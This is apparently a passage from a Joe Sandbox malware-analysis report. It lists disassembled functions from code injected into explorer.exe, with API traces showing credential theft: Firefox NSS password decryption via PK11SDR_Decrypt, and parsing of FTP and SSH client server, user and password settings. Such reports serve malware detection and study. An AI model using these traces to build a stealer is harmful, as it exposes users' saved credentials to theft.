CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00801684

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 4fe39de92ea68bb46a46f8db5bef3012a412eab48fd8fa7edcdf72032ce2c3c1
Instruction ID: 62c25343dd0fe9b9c37a01fb4e6e372eaf0e69a918ac45f34d37ee5954f9341b
Opcode Fuzzy Hash: 4fe39de92ea68bb46a46f8db5bef3012a412eab48fd8fa7edcdf72032ce2c3c1
Instruction Fuzzy Hash: D5C012301202219EEBA01A608C09B8626D4AF297B2F060A2AA0819A0C0E2A908C08A90

Function 0080104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0080158A), ref: 00801056

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 11a9f181add896e10fb5ba244aa6eb0fe0a8961aa209457fe6bb0774bc30ee7a
Instruction ID: 91f9c49677c26917e426947995963a89b802e5728e3fc3edd6aa30aeb203f983
Opcode Fuzzy Hash: 11a9f181add896e10fb5ba244aa6eb0fe0a8961aa209457fe6bb0774bc30ee7a
Instruction Fuzzy Hash: ECA002F07D57007AFDA95762AE1FF152938A750F13F500344B30D7D0D065E87514852D

Function 0080105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,00804A5B,?,?,00000000,?,?,?,?,00804B66,?), ref: 00801065

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5140f037142d64d5c83a9ab350135dbd6c39ae110d2db98eabfaed015ef28934
Instruction ID: 7dfdc82872c291555c15607888c0087b09622bd812f287d4405b7490e5482391
Opcode Fuzzy Hash: 5140f037142d64d5c83a9ab350135dbd6c39ae110d2db98eabfaed015ef28934
Instruction Fuzzy Hash: EBA002746D0B00A6EDF457205D0AF1536147B40B03F6045447241AA0D15DA9E0548A18

Non-executed Functions

Function 0080349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 008034C0

Part of subcall function 008033C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00803401

OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,008037A8), ref: 008034E9

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0080351E
NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00803541
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00803586
DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0080358F
lstrcmpiW.KERNEL32(00000000,File), ref: 008035B6
NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 008035DE
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 008035F6
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00803606
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0080361E
GetFileSize.KERNEL32(?,00000000), ref: 00803631
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00803658
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0080366B
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00803681
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 008036AD
CloseHandle.KERNEL32(?), ref: 008036C0
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,008037A8), ref: 008036F5

Part of subcall function 00801C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00801CC0
Part of subcall function 00801C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00801CDA
Part of subcall function 00801C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00801CE6

CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,008037A8), ref: 00803707

Strings

File, xrefs: 008035B0

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
String ID: File
API String ID: 3915112439-749574446
Opcode ID: 1c415b3159954f4c3f2b2b2be446962c354ddf5534b094094b8797ef465126ab
Instruction ID: 361d50bd6f6ad5f2f13bce865a6a8575a6cee4f940a624b00b974f67a465d24a
Opcode Fuzzy Hash: 1c415b3159954f4c3f2b2b2be446962c354ddf5534b094094b8797ef465126ab
Instruction Fuzzy Hash: 2D618E70204701AFD7909F20CC88B2B7BADFB84755F400928F996E72E1EB35DA549B52

Function 00854438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00854502
memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0085475F
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00854803

Strings

%s mode not allowed: %s, xrefs: 008547D0
no such vfs: %s, xrefs: 0085482F
cache, xrefs: 008546FA
mode, xrefs: 00854712
cach, xrefs: 008546DC
access, xrefs: 00854725
no such %s mode: %s, xrefs: 00854784
invalid uri authority: %.*s, xrefs: 00854513
file, xrefs: 00854474
localhost, xrefs: 008544FD

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: a6f19f82d7fb0fbbc08e17d00bc0fb5459f5e8858fdc83320679d0f8369c010c
Instruction ID: ec35b151fe3c1bf8352401d0f78bc29ff3e05ab2743eac483ba9571da38ff4eb
Opcode Fuzzy Hash: a6f19f82d7fb0fbbc08e17d00bc0fb5459f5e8858fdc83320679d0f8369c010c
Instruction Fuzzy Hash: 49C10474A083459BEB34CE18849077ABBD1FB9A31EF14256EECD5C7282D724D8CD8B46

Function 00825F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 00806AAA: memset.NTDLL ref: 00806AC5

memset.NTDLL ref: 00825F53

Strings

cannot open table without rowid: %s, xrefs: 00825FCF
indexed, xrefs: 008260E8
cannot open view: %s, xrefs: 00825FF3
cannot open %s column for writing, xrefs: 00826255
cannot open virtual table: %s, xrefs: 00825FAA
no such column: "%s", xrefs: 00826271
foreign key, xrefs: 008260A3

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: ceec4993e951546bbd3bc0e6b2082471151c07ae32c35bfa7dcdc7a9f6329a19
Instruction ID: 90b455b9f352de6fa1a98238fa444f9019b2ba67c4e7257a8a31321c3bf3fbdd
Opcode Fuzzy Hash: ceec4993e951546bbd3bc0e6b2082471151c07ae32c35bfa7dcdc7a9f6329a19
Instruction Fuzzy Hash: F5C16D706047119FCB14DF29D880A2AB7E2FF88714F14892DF855D7281EB35EDA6CB92

Function 00804440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(008562B0,00000000,00000001,008562A0,?), ref: 0080445F
SysAllocString.OLEAUT32(?), ref: 008044AA
lstrcmpiW.KERNEL32(RecentServers,?), ref: 0080456E
lstrcmpiW.KERNEL32(Servers,?), ref: 0080457D
lstrcmpiW.KERNEL32(Settings,?), ref: 0080458C

Part of subcall function 008011E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,008046E3), ref: 008011ED
Part of subcall function 008011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0080120F
Part of subcall function 008011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00801231

lstrcmpiW.KERNEL32(Server,?), ref: 008045BE
lstrcmpiW.KERNEL32(LastServer,?), ref: 008045CD
lstrcmpiW.KERNEL32(Host,?), ref: 00804657
lstrcmpiW.KERNEL32(Port,?), ref: 00804679
lstrcmpiW.KERNEL32(User,?), ref: 0080469F
lstrcmpiW.KERNEL32(Pass,?), ref: 008046C5
wsprintfW.USER32 ref: 0080471E

Strings

RecentServers, xrefs: 00804569
Servers, xrefs: 00804578
User, xrefs: 0080469A
Pass, xrefs: 008046C0
Settings, xrefs: 00804587
Port, xrefs: 00804674
%s:%s, xrefs: 00804718
Server, xrefs: 008045B9
Host, xrefs: 00804652
LastServer, xrefs: 008045C8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: 33cc687497e77ed4d6374d0bac270f2296916d2626c41458934360f81dabded0
Instruction ID: 95f87cf7294b0106f992468250be8995d3b164656ee9d79d90df00dc7e59b474
Opcode Fuzzy Hash: 33cc687497e77ed4d6374d0bac270f2296916d2626c41458934360f81dabded0
Instruction Fuzzy Hash: DCB107B1244306AFD740DF64C884E2AB7E9FF89755F10895CF655CB2A0EB71E80ACB52

Function 008024B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

Part of subcall function 00801090: lstrlenW.KERNEL32(?,?,00000000,008017E5), ref: 00801097
Part of subcall function 00801090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 008010A8

Part of subcall function 008019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00802CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 008019C4

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00802503
SetCurrentDirectoryW.KERNEL32(00000000), ref: 0080250A
LoadLibraryW.KERNEL32(00000000), ref: 00802563
SetCurrentDirectoryW.KERNEL32(?), ref: 00802570
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00802591
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0080259E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 008025AB
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 008025B8
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 008025C5
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 008025D2
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 008025DF

Part of subcall function 0080190B: lstrlen.KERNEL32(?,?,?,?,00000000,00802783), ref: 0080192B
Part of subcall function 0080190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00802783), ref: 00801930
Part of subcall function 0080190B: lstrcat.KERNEL32(00000000,?), ref: 00801946
Part of subcall function 0080190B: lstrcat.KERNEL32(00000000,00000000), ref: 0080194A

Strings

PK11_Authenticate, xrefs: 008025BA
PK11SDR_Decrypt, xrefs: 008025C7
PK11_GetInternalKeySlot, xrefs: 008025AD
NSS_Shutdown, xrefs: 00802593
SECITEM_FreeItem, xrefs: 008025A0
nss3.dll, xrefs: 00802510
NSS_Init, xrefs: 0080258B
PK11_FreeSlot, xrefs: 008025D4
sql:, xrefs: 0080262B

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: e5d4f6aeb80c8385769561e34de00ccad274dbb8cbe5fbebdd306c84c618c77c
Instruction ID: d51e2bb4796879e0eaa6e308b44b78e81bedf4099a11138778617950d885d258
Opcode Fuzzy Hash: e5d4f6aeb80c8385769561e34de00ccad274dbb8cbe5fbebdd306c84c618c77c
Instruction Fuzzy Hash: 39415931A007018BCF94AF795C5C52E7AE9FB95752748012EE951D33E2EFF98C058B52

Function 00805E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 00805BF5: memset.NTDLL ref: 00805C07

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 008060E1
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 008060EC
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 00806113
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 0080618E
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 008061B5
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 008061C1

Strings

%02d, xrefs: 00806039, 008061D3
%04d, xrefs: 00806016
%.16g, xrefs: 00806077
%06.3f, xrefs: 00806229
W, xrefs: 00806193
%03d, xrefs: 008061F3
%lld, xrefs: 00806122

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: f708a5add0c2a2054645f9eea0782ecf03870db1b6a7c890ed16eac6160069ab
Instruction ID: 7d4073c61cb58d5bd0d640e060a761033aced4f55ef4e13440fe2f4542a7bd74
Opcode Fuzzy Hash: f708a5add0c2a2054645f9eea0782ecf03870db1b6a7c890ed16eac6160069ab
Instruction Fuzzy Hash: 6EB18FB2908B879BD7719E28CC85B3B7BD4FB80304F140559F982E61D1FA24DD748AA2

Function 0081D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL(0085637A,BINARY,00000007), ref: 0081D324

Strings

%s(%d), xrefs: 0081D3AB
NULL, xrefs: 0081D40F
k(%d, xrefs: 0081D2EE
(%.20s), xrefs: 0081D38A
%.16g, xrefs: 0081D3E5
BINARY, xrefs: 0081D31E
program, xrefs: 0081D46A
(blob), xrefs: 0081D416
,%d, xrefs: 0081D444
,%s%s, xrefs: 0081D34E
%lld, xrefs: 0081D3CA
vtab:%p, xrefs: 0081D423

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: ca6e7c40ff4bbfcce15b212faf5646b810e2b61c0a5ab5c5fde61122e3eca608
Instruction ID: 4dd90949c729be4d335f9614d07bf9f6bbf6bef61f4d5655e18804bef1409dfc
Opcode Fuzzy Hash: ca6e7c40ff4bbfcce15b212faf5646b810e2b61c0a5ab5c5fde61122e3eca608
Instruction Fuzzy Hash: E351E271908304ABC710DF54CC41BAAB3A9FF45305F14486AFD62EB281FB74E849CBA2

Function 008048B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 008019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A1E
Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A3C
Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A75
Part of subcall function 008019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A98

Part of subcall function 0080482C: lstrlenW.KERNEL32(?), ref: 00804845
Part of subcall function 0080482C: lstrlenW.KERNEL32(?), ref: 0080488F
Part of subcall function 0080482C: lstrlenW.KERNEL32(?), ref: 00804897

wsprintfW.USER32 ref: 008049A7
wsprintfW.USER32 ref: 008049B9

Strings

%s:%u/%s, xrefs: 00804982, 008049A5
Password, xrefs: 008048E4
%s:%u, xrefs: 00804971, 008049B7
RemoteDirectory, xrefs: 008048F8
HostName, xrefs: 008048C4
UserName, xrefs: 008048D2

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: add35eb28b405650205ad5c9ab9b6bfec1a51d9466743b95753c794387de6641
Instruction ID: 540f4b880fff55dbc5847e5d3af8098261985d6fe3bb565181fee66dc647fbd8
Opcode Fuzzy Hash: add35eb28b405650205ad5c9ab9b6bfec1a51d9466743b95753c794387de6641
Instruction Fuzzy Hash: 2E3126A0B403045BCB90AB6ACC0592BBEDDFFC6748B45492DB640C32D1EFB1CC1583A2

Function 0080F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 0080FB32
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0080FB4D
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0080FB60
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0080FB95

Strings

-wal, xrefs: 0080FBA9
nolock, xrefs: 0080FC4E
-journal, xrefs: 0080FB6B
immutable, xrefs: 0080FC68

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: 83c94c64a845f227d15fcf9cef2706dfacf7db9cd6c596a32c4c95e0f7d56112
Instruction ID: 54326200eeebbb4fc652582a174ada060da0fd0b5b3533a9b519aba8ccb59ec7
Opcode Fuzzy Hash: 83c94c64a845f227d15fcf9cef2706dfacf7db9cd6c596a32c4c95e0f7d56112
Instruction Fuzzy Hash: 7CD1ADB16083418FDB64DF28C881B1ABBE1FF95314F08853DED98CB292EA74D805CB52

Function 00807820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

%, xrefs: 00807822
-x0, xrefs: 00807325
NaN, xrefs: 008073F8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: a345f1c77a93458ca934aa804edc7935dec60946fb289187c992fd78f723814c
Instruction ID: 4af05c0b54586f2dacbdce71352deabebba6c32b8d07b5038620a6a6ad600ea8
Opcode Fuzzy Hash: a345f1c77a93458ca934aa804edc7935dec60946fb289187c992fd78f723814c
Instruction Fuzzy Hash: 29D1F430E0C7928BE7A58A288C9032BBBE1FF95304F28495DF9C2C73D1D664E955D782

Function 008078B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

-x0, xrefs: 00807325
NaN, xrefs: 008073F8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 02e4140addec74b8a3b095d1c51008528f38611a5c1305f321259de480d4cbc4
Instruction ID: 6095e3af930c7291edd0d2dc7b6bdeadcb074470726a9a4fc4abf7304f241d62
Opcode Fuzzy Hash: 02e4140addec74b8a3b095d1c51008528f38611a5c1305f321259de480d4cbc4
Instruction Fuzzy Hash: 2CE1F430E0C3928BE7A58A288C5032BBBE1FF95308F28495DF9C2D73D1D664E955D792

Function 00807A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

-x0, xrefs: 00807325
NaN, xrefs: 008073F8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 6ec534b1d8dd8ae8347ea10d59aae216a597f2121d16daca641fc9ce2739ad18
Instruction ID: c3a73e0291d8ad069382fc5ccaef544debd85c22b54ef5ccc5c22dd6d80090ea
Opcode Fuzzy Hash: 6ec534b1d8dd8ae8347ea10d59aae216a597f2121d16daca641fc9ce2739ad18
Instruction Fuzzy Hash: 29E1E230E0C3828BE7A58A28CC9172ABBE1FF95304F28495DF8C1D73D1D664E955D792

Function 00807A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

-x0, xrefs: 00807325
NaN, xrefs: 008073F8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: e21c275a60b857c50945a54537f5a7dfe1a42e5497f1fa4f1300408e4270d753
Instruction ID: d76ed364d4a3492736babce2fbb80ebe951f1eef0f96e0318668a058885363ca
Opcode Fuzzy Hash: e21c275a60b857c50945a54537f5a7dfe1a42e5497f1fa4f1300408e4270d753
Instruction Fuzzy Hash: 31E1E170E0C3928BE7A58A28CC9072ABBE1FF95304F28495DF8C1C73D2D664E955D792

Function 008077F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

-x0, xrefs: 00807325
NaN, xrefs: 008073F8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: a37bbf889588b17ec5ad886a50ea9f372ad9f668e62b686ea07cde4b7158de75
Instruction ID: 81d3cbb21a5e2a4f6d1cd6c7054066f095c191ba8631f084deb70397acb0abff
Opcode Fuzzy Hash: a37bbf889588b17ec5ad886a50ea9f372ad9f668e62b686ea07cde4b7158de75
Instruction Fuzzy Hash: EEE1F370A0C3928BE7A58A28CC9072ABBE1FF95304F24495DF8C2C73D1D664E955C742

Function 008070C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0080720E
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00807226
_aulldvrm.NTDLL(00000000,00000000,?), ref: 0080727B

Strings

-x0, xrefs: 00807325
NaN, xrefs: 008073F8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: e50555a394849fd32df3a992e3a8610886a5cf1a4f965607629faa0880ebe795
Instruction ID: 245a392ea7f52657e27b456395b3a8bc2eeb1fd4c90d0af760578a8b1067e27f
Opcode Fuzzy Hash: e50555a394849fd32df3a992e3a8610886a5cf1a4f965607629faa0880ebe795
Instruction Fuzzy Hash: 84D1F470E0C7928BE7A58A288C9072BBBE1FF95304F28495DF8C2C73D1D664E955D782

Function 0080898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00808AAD
_allmul.NTDLL(?,?,0000000A,00000000), ref: 00808B66
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00808C9B
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00808CAE

Strings

., xrefs: 00808B17

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: f137aa3beada4183863d5b70bd7f654bc39852b5464484bb9c970c26b1ed1643
Instruction ID: 2114e57aaaa0fb61c15da48d80817cd200122cc81578a68b81da9241a572cfb5
Opcode Fuzzy Hash: f137aa3beada4183863d5b70bd7f654bc39852b5464484bb9c970c26b1ed1643
Instruction Fuzzy Hash: 8BD1E6B190D799CBD7A49F088C8022ABBF0FB95315F04095EFAC5D72D1DBB189858B86

Function 0082D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0082D6A0
memset.NTDLL ref: 0082D6B3
memset.NTDLL ref: 0082D6C3

Strings

,, xrefs: 0082D6FC
9, xrefs: 0082D701
7, xrefs: 0082D71B

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: 5c9f065025922355a841a56f7d699f92c067c80525d6906460a7b692b5f1c639
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: F13156715083949ED320DF64D880B9FBBE8FB85340F00892EB989D6251EB75964CCBA3

Function 00801BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,00802E75,PathToExe,00000000,00000000), ref: 00801BCC
StrStrIW.SHLWAPI(00000000,.exe,?,00802E75,PathToExe,00000000,00000000), ref: 00801BF0
